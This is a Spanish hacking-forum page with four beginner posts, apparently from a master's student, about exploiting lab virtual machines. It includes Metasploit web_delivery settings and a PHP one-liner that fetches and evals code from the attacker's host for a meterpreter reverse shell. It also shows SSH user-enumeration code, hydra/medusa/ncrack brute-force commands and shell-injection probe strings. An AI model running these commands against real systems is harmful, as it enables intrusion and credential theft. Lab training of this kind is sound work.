elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Escalada de privilegios con WEB_DELIVERY en: 10 Septiembre 2018, 14:20 pm
Buenos días,
Tengo que hacer una escalada de privilegios de una máquina virtual basada en Ubuntu.
Detecto a través de la herramienta VEGA, que existe 1 vulnerabilidad crítica “Shell Injection” y para explotar la misma, me obligan a realizarlo a través del módulo web_delivery de metaesploit, por tanto, procedo a los siguientes pasos:

Use exploit/multi/script/web_delivery
Msf exploit (web_delivery)>set lhost 192.168.1.132

 (entiendo que aquí es donde pongo la ip de la máquina donde tengo alojado Kali Linux, sin embargo, en ningún momento estoy metiendo la IP de la máquina donde tengo que hacer la escalada de privilegios, que sería Rhost si no me equivoco)
Msf exploit (web_delivery)>set lport 4444
Msf exploit (web_delivery)>set target 1
Msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

(entiendo que elijo PHP ya que es Ubuntu donde se encuentra la máquina a atacar)
Msf exploit (web_delivery)>run

Obtengo el siguiente código malicioso php, sin embargo, no sé dónde ejecutarlo en la máquina de la víctima.
Php –d allow_url_fopen=true –r “eval(file_get_contents(´http://192.168.1.132:8080/qH0s5l2UGvbKap’));”
¿lo pongo seguido a la url? http://192.168.1.132/ping/index.php?ip=
Estoy empezando en esto y soy muy torpe.
Gracias de antemano.

2  Seguridad Informática / Hacking / Exploit OpenSSH7.2_p2 en: 14 Mayo 2018, 19:16 pm
Buenas a todos,

Tengo una máquina virtual de la cual tengo que obtener las credenciales de acceso. Una vez escaneado los puertos y visto vulnerabilidades, encuentro una vulnerabilidad en el puerto 22 para la tecnología OPENSSH7.2_p2 "enumeration username".

Procedo a descargar el archivo 40136.py y a ejecutarlo a través del comando

Desktop# 40136.py -U unix_users.txt 192.168.xxx.xxx


Utilizo para ello muchas diccionarios, pero nada de nada
 - rockyou.txt
- namelist.txt
- apache-user-enum-1.0.txt
- etc.

Procedo a utilizar otras herramientas y sigo sin avanzar.

NCRACK;  -p22 -U rockyou.txt -P rockyou.txt 192.168.xxx.xxx
MEDUSA;  -U rockyou.txt -P rockyou.txt -h 192.168.xxx.xxx -M ssh
HYDRA:  hydra -l user -P rockyou.txt ssh://192.168.xxx.xxx

ALguna Idea??? Soy principiante al respecto muchas gracias

Adjunto contenido del archivo py

Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('127.0.0.1', username=user,
        password=p)
except:
        endtime=time.clock()
total=endtime-starttime
print(total)

3  Seguridad Informática / Hacking / Escaneo Vilnerabilidades en VEGA_ SQL Injection en: 2 Abril 2018, 14:22 pm
Buenos días a todos,

Me da vergüenza preguntar, pero es que soy novato de cojones.

Estoy estudiando un master y en teoría tengo que explotar las vulnerabilidades de una máquina virtual.

Después de haber obtenido la IP de la máquina a atacar, pase NMAP y/o ZENMAP para descubrir puertos abiertos así como las tecnologías usadas.

Después de ello, utilicé VEGA para detectar vulnerabilidades. Encontré unas cuantas, entre las cuales estaba la famosa SQL Injection ademas de Shell Injection.

SQL Injection

At a glance
Classification Input Validation Error
Resource http://192.168.253.128/ping/index.php
Parameter ip
Method GET
Detection Type Blind Text Injection Differential
Risk High

Request
GET /ping/index.php?ip=127.0.0.1'"


SHELL INjection

At a glance
Classification Information
Resource /ping/index.php
Parameter ip
Method GET
Risk High


Request
GET /ping/index.php?ip=127.0.0.1`true`



Desde mi desconocimiento, decidí utilizar ARMITAGE, pero no me funciona en la máquina virtual, mas bien, ningún exploit funciona. el mensaje es "NO ACTIVE SESSIONS"

Entiendo que todas las vulnerabilidades encontradas en VEGA tendré que explotarlas manualmente.

¿como exploto las vulnerabilidades encontradas" He visto numeroso videos en internet pero siempre ponen el ejemplo de Id=x y yo eso en mi máquina virtual no existe.

Gracias de antemano.

4  Seguridad Informática / Hacking / Duda acceso a un servidor (ejercicio master) en: 30 Agosto 2017, 10:06 am
Buenas a todos,

Trabajo en seguridad física y ahora me gustaría ampliar mis conocimientos en seguridad lógica, para ello acabo de apuntarme a un master de ciberseguridad, ya que estoy un poco pez en este tema.

Me gustaría haceros una pregunta.

Me han planteado un ejercicio en el cual me dicen que tengo que obtener un archivo confidencial de un servidor de una empresa X. Las únicas personas que tienen acceso a dicho archivo son:

-          “la persona A” (dispone de un pc de mesa);

-          “la persona B” (dispone de pc de mesa y una Tablet);

-          ”la persona C” (portátil).

¿Cómo conseguirías el archivo?

Entiendo que una vez accediera a la red de la empresa podría utilizar varias técnicas: BACKDOOR, PISHER. Otro ejemplo sería un KEYLOGGER. (corregidme si me equivoco)….pero ¿cómo accedo a su red?

Entiendo que la forma de plantear el ejercicio (las 3 personas) será porque alguno de los dispositivos será más vulnerable o ¿no?

Gracias de antemano a todos.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines